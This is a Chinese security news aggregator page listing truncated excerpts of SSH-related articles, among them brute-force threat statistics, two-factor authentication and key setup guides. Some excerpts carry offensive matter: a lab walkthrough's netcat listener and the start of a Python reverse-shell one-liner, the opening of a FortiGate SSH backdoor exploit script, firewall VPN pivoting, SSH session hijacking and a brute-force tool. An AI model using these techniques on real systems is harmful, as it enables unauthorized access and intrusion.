记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

威胁检测之SSH暴力破解

0x00、前言暴力破解攻击是公有云最常见的攻击方式,根据某公有云统计数据发现,暴力破解占主机威胁数据的56%以上。平均到每个月大约有250万次之多,与此同时,再对比统计暴力破解成功的事件量,平均每月2500次,暴力破解成功率在0.1%。如果以主机为维度统计,暴力破解成功率就明显的提高了,大约在11%。通过上述数据分析,在公有云环境中,威胁检测产品需要对暴力破解攻击有足够的技术识别与防范。然后,我们再从攻击者的角度分析:分别从国家和城市两个维度分析,我们发现黑客暴力破解基础设施大部分分布在中国(44%)、美国(20%)和荷兰(7%)。城市分布:绍兴(10.1%)、纽约(8.8%)、阿姆斯特丹(5.6%)、北京(5.6%)
发布时间:2019-10-30 13:10 | 阅读:12602 | 评论:0 | 标签:系统安全 SSH 暴力破解

Drupal web服务器从脏牛到持续后门

本文,我们将讲解一种简短有效而且十分严重的攻击,攻击对象是基于Linux的系统。在这次攻击中,攻击者使用了一系列的漏洞,包括臭名昭著的Drupalgeddon2和脏牛漏洞,还有系统配置错误,对存在漏洞的drupal web服务器进行持久化的攻击,并最终控制用户主机。在以前,对web服务器的远程代码执行(RCE)攻击通常都是一次性的安全事件——攻击者运行恶意代码,服务器执行代码,这样就完了。如果管理员检测到进程并且终止了进程,或者重启了web服务器,这样的攻击也就结束了。而现在,越来越多的攻击者开始进行持续性攻击。持续性意味着如果攻击进程被终止或者服务器重启之后,他们有方法非常轻易的就重新感染web服务器,或者是执行额外
发布时间:2018-12-14 12:20 | 阅读:83305 | 评论:0 | 标签:Web安全 SSH 后门 脏牛

SSH 暴力破解趋势:从云平台向物联网设备迁移 | 云鼎实验室出品

导语:近日,腾讯云发布2018上半年安全专题系列研究报告,该系列报告围绕云上用户最常遭遇的安全威胁展开,用数据统计揭露攻击现状,通过溯源还原攻击者手法,让企业用户与其他用户在应对攻击时有迹可循,并为其提供可靠的安全指南。上篇报告从 DDoS 攻击的角度揭示了云上攻击最新趋势,本篇由同一技术团队云鼎实验室分享:「SSH 暴力破解趋势:从云平台向物联网设备迁移 」, 以下简称《报告》。 一、基本概念 SSH 暴力破解是什么? SSH 暴力破解是一种对远程登录设备(比如云服务器)的暴力攻击,该攻击会使用各种用户名、密码尝试登录设备,一旦成功登录,便可获得设备权限。本篇报告内容云鼎实验室从攻击现状、捕获样本、安全建议等方面展开。 近些年,新出现了众多入侵系统的手法,比如 Apache Struts2 漏洞利用、Had
发布时间:2018-07-16 13:45 | 阅读:148373 | 评论:0 | 标签:网络安全 DDoS SSH SSH暴力破解 云平台 挖矿 暴力破解

VNCserver实现共享linux

阅读: 108vncserver 是一个为了满足分布式用户共享服务器上面的资源,而在服务器上开启的一项服务。它也可以是不同的操作系统,比如利用windows远程访问linux系统资源的一种远程访问方式。优点:可使服务器的图形化交互界面可见。前提:需要在服务器端安装并配置vncserver,在客户端安装vncviewer比较好用的两个:tightvncserver: 特别轻量级,它只能新建立桌面(即可以在一台linux上打开若干个桌面供若干用户使用),不能查看TTY7/TTY1正在显示的桌面(但x11vnc可以),相比x11vnc安全传输差一些。x11vnc:安全传输比较好,占用资源比tightvncserver要多文章目录vncserver的安装配置Vncserver的反向连接设置vncserver的安装配置1
发布时间:2017-09-29 08:10 | 阅读:86766 | 评论:0 | 标签:技术前沿 ssh vnc vnc使用教程 vnc使用方法 vnc连接linux

通过微信小程序“运维密码”实现SSH双因子认证

近来,京东、优酷等多家知名企业都发生了密码泄露,造成用户隐私泄露。可见,单一密码对敏感和重要信息进行保护力量越来越弱,所面临的挑战亦是愈发严峻。因此业内对多重认证的呼声也越来越高,而其中的双因子认证得到了业界的普遍认可。本文主要介绍SSH双因子认证,结合了当下热门的微信小程序的“运维密码”,来实现认证保护。 双因子认证机制 对于网络信息系统来说,能否识别使用者的身份,是能否确保安全的基础和关键。在实际应用中,许多网络信息系统都会要求使用者在使用系统之前,提供一些相关信息用以实现对使用者的身份认证。双因子认证(2FA)弥补了传统密码认证方法的很多弊端,是指结合密码以及实物(信用卡、SMS手机、令牌或指纹等生物标志)两种条件对用户进行认证的方法。 SSH双因子认证 在实现多重认证的系统中,用户需要通过两种不同的认证
发布时间:2017-06-11 15:05 | 阅读:97778 | 评论:0 | 标签:数据安全 ssh

SSH端口转发情景模拟

SSH会自动加密和解密所有SSH客户端与服务端之间的网络数据。这一过程有时也被叫做“隧道”(tunneling),这是因为SSH为其他TCP链接提供了一个安全的通道来进行传输而得名。例如,Telnet,SMTP,LDAP这些TCP应用均能够从中得益,避免了用户名,密码以及隐私信息的明文传输。而与此同时,如果您工作环境中的防火墙限制了一些网络端口的使用,但是允许SSH的连接,那么也能够通过将 TCP 端口转发来使用 SSH 进行通讯。 (一)概述 SSH端口转发能够将其他TCP端口的网络数据通过SSH链接来转发,并且自动提供了相应的加密及解密服务。 (二)功能 1、加密SSH Client端至SSH Server端之间的通讯数据。 2、突破防火墙的限制完成一些之前无法建立的TCP连接。 (三)   方式
发布时间:2017-03-21 19:30 | 阅读:173161 | 评论:0 | 标签:网络安全 ssh

brut3k1t:服务端暴力破解工具

项目主页 https://github.com/ex0dus-0x/brut3k1t 简介 brut3k1t是一款支持多种协议的服务端的暴力破解工具,目前支持的协议有: ssh ftp smtp XMPP instagram facebook 将来会实现更多协议和服务(包括Twitter,Facebook和Instagram) 安装 安装简单。brut3k1t需要几个requires: argparse – 用于解析命令行参数 paramiko – 用于SSH连接和认证 ftplib – 用于FTP连接和认证 smtplib – 用于与SMTP (email) 连接和认证 fbchat – 用于与Facebook连接 selenium &
发布时间:2016-11-21 18:50 | 阅读:203859 | 评论:0 | 标签:工具 brut3k1t Facebook FTP smtp SSH 爆破工具 暴力破解

如何在SSH通道中隐藏OpenVPN流量?

传统防火墙会根据目标 IP 地址和端口号来屏蔽连接,但更高级的防火墙会使用深度包检测(DPI)技术或者状态包检测(SPI)技术来识别不同类型的加密算法和VPN协议。这就意味着它们能够检测出OpenVPN流量并将其标识出来,以方便管理员决定是否屏蔽目标服务器。有三种方法可以绕过这种检测:使用混淆(obfuscation)代理,使用 SSL 通道或者使用 SSH 通道。在本教程中,我们将讨论最后一种方法。SSH 通道会将你已经加密的链接封装在另一层加密中,这样防火墙就无法进行识别。这种方法可以用在绕过部署有完备 DPI 和 SPI 防火墙的公司或像天朝这种具有重度审查机制的国家。但基于 SSH 通道的 OpenVPN 也有几个缺点。第一个就是双重加密必然会导致效率的降低。其次是虽然 OpenV
发布时间:2016-05-16 13:40 | 阅读:229358 | 评论:0 | 标签:数据安全 openvpn ssh

TEST LAB V8在线渗透实验室教程(四)

在前三个部分,我们已经成功拿下了网络中的6个系统。这一部分我们将渗透SSH-Dev和Portal系统。攻击SSH-Dev正如上图所示,ssh-dev系统的IP是172.16.0.3,通过VPN网络无法ping通它。所以我们通过Cabinent系统ping下试试,在第一部分中我们已经攻破了Cabinet系统,上传了一个PHP shell。利用这个后门,我们ping SSH-Dev系统。通过Cabinet系统可以到达SSH-Dev系统,让我们建立一个Cabinet系统的反连shell,用它来攻击SSH-Dev,使用下面的命令执行netcat:nc-lvp 80我们使用Python的反连shell,回连监听的80端口:python -c “import sys,socket,os,pty; _,
发布时间:2016-04-25 15:55 | 阅读:122386 | 评论:0 | 标签:系统安全 网络安全 ssh Test Lab 内网渗透

TEST LAB V8在线渗透实验室教程(三)

这一部分我们将演示渗透Mail和SSH系统攻击MAIL当前,我们已经有了Westfall的账号和密码,可以登录它的邮箱,通过浏览其收件箱,我们找到了另外两个与sas-bank相关的邮箱账号。我们在使用Metasploit攻破terminal系统后,得到了一个用户名和密码列表。如果仔细查看所有的用户名,会发现有一个用户名与我们在Westfall的收件箱中找到的email地址有一些类似,比如leroydeschamp@sas-bank.lab,我们尝试用这个账户登录邮箱,密码使用其登录termimal系统的密码,成功登录了。打开收件箱,找到了一个邮件token。还有另外一个有趣的邮件,似乎是对攻击其它系统的提示,稍后我们再仔细研究。攻击SSH在第二部分中我们攻破了terminal系统,在Wes
发布时间:2016-04-23 16:25 | 阅读:94242 | 评论:0 | 标签:系统安全 网络安全 Mail ssh Test Lab 渗透教程

飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7

from:tools.pwn.ren 今天 twitter 4 点钟的时候 有老外放出一个飞塔 os 的 exp ,说 4.0 – 5.0.7 !存在一个 ssh 的后门 进行了简单的测试,影响确实重大! 通过过Zoomeye搜索发现存在 64567台主机, 挑选一台进行测试 利用脚本 #!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip> import socket import select import sys import paramiko from paramiko.py3
发布时间:2016-01-14 02:10 | 阅读:121306 | 评论:0 | 标签:Linux/Unix exp OS ssh 后门 飞塔 飞塔系统

飞塔SSH后门 进一步利用方法

from:tools.pwn.ren 昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html) 那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。 这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的 vpn服务来进入到内网中 ,从而进行进一步渗透。 0X00 先看下用户组 show user group 0x01开启vpn config vpn pptp set status enable set eip 192
发布时间:2016-01-14 02:10 | 阅读:113966 | 评论:0 | 标签:Linux/Unix Backdoor fortigate OS ssh 后门 飞塔

飞塔防火墙曝SSH后门 官方回应并给出解决方案

昨天下午国内安全圈传出的FortiGate(飞塔防火墙)4.x-5.07版本均存在SSH后门一事,早在上周六就在国外安全网站seclists.org曝光。据物联网搜索引擎ZoomEye昨晚的统计,互联网上飞塔防火墙设备含有后门的比例约为13.5%,牛君在此向已经忙碌一夜和即将不眠的安全圈小伙伴致敬,大家辛苦了,安全产品不安全啊!今日凌晨,飞塔官方紧急发出声明,称近日被公开安全问题早在14年7月被修复并给出补丁。官方原文如下:近日被公开的这个安全问题已经被修复,并且在2014年7月作为Fortinet代码库质量和完整性确认约定的一部分中已经给出补丁。这不是一个“后门”漏洞问题,而是认证管理问题。这个问题已经被我们的产品安全团队在常规检查和测试中发现。经过认真的分析和调查,我们可以确认这个问题不是由于任何组织,内部
发布时间:2016-01-13 16:00 | 阅读:112953 | 评论:0 | 标签:动态 威胁情报 SSH 后门 飞塔防火墙 防火墙

劫持SSH会话注入端口转发

0x00 前言 昨天A牛发群里的链接,其实这种攻击我感觉适合留后门,属于Post Exploitation阶段,我以前也没用过这个方法,都是傻呼呼的用个ld_preload后门,实际环境测试通过后,发现可用,比较有实用价值,就分享下,有错误的地方还请大家指出。 0x01 细节 1.1第一种场景: 攻击流程如下:SSH客户(ssh_user)连接到hop_1,攻击者(attacker)能够控制ssh_user这台机器,攻击者通过注入端口转发来实现入侵hop_1和hop_2之后的网络。步骤如下: 1. 攻击者可以用两种方式来修改ssh客户端,如果有ROOT权限可以直接修改/etc/ssh/ssh_config,如果没有修改ssh_config文件的权限,可以通过在相应用户的.bashrc中封装ssh来实现。主
发布时间:2015-03-18 12:35 | 阅读:95039 | 评论:0 | 标签:技术分享 SSH 劫持SSH会话 端口转发 注入

使用ssh-keygen设置ssh无密码登录

也知道这个东西,大家都会,就当是谁忘了的时候,做个提醒的吧。。。 ssh 是一个专为远程登录会话和其他网络服务提供安全性的协议。默认状态下ssh链接是需要密码认证的,可以通过添加系统认证(即公钥-私钥)的修改,修改后系统间切换可以避免密码输入和ssh认证。以下将创建过程简单介绍下。 一、用ssh-keygen创建公钥 haifeng@haifeng-EX38-DS4:/$ ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/home/haifeng/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Ent
发布时间:2013-04-15 14:35 | 阅读:83946 | 评论:0 | 标签:Linux ssh ubuntu

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词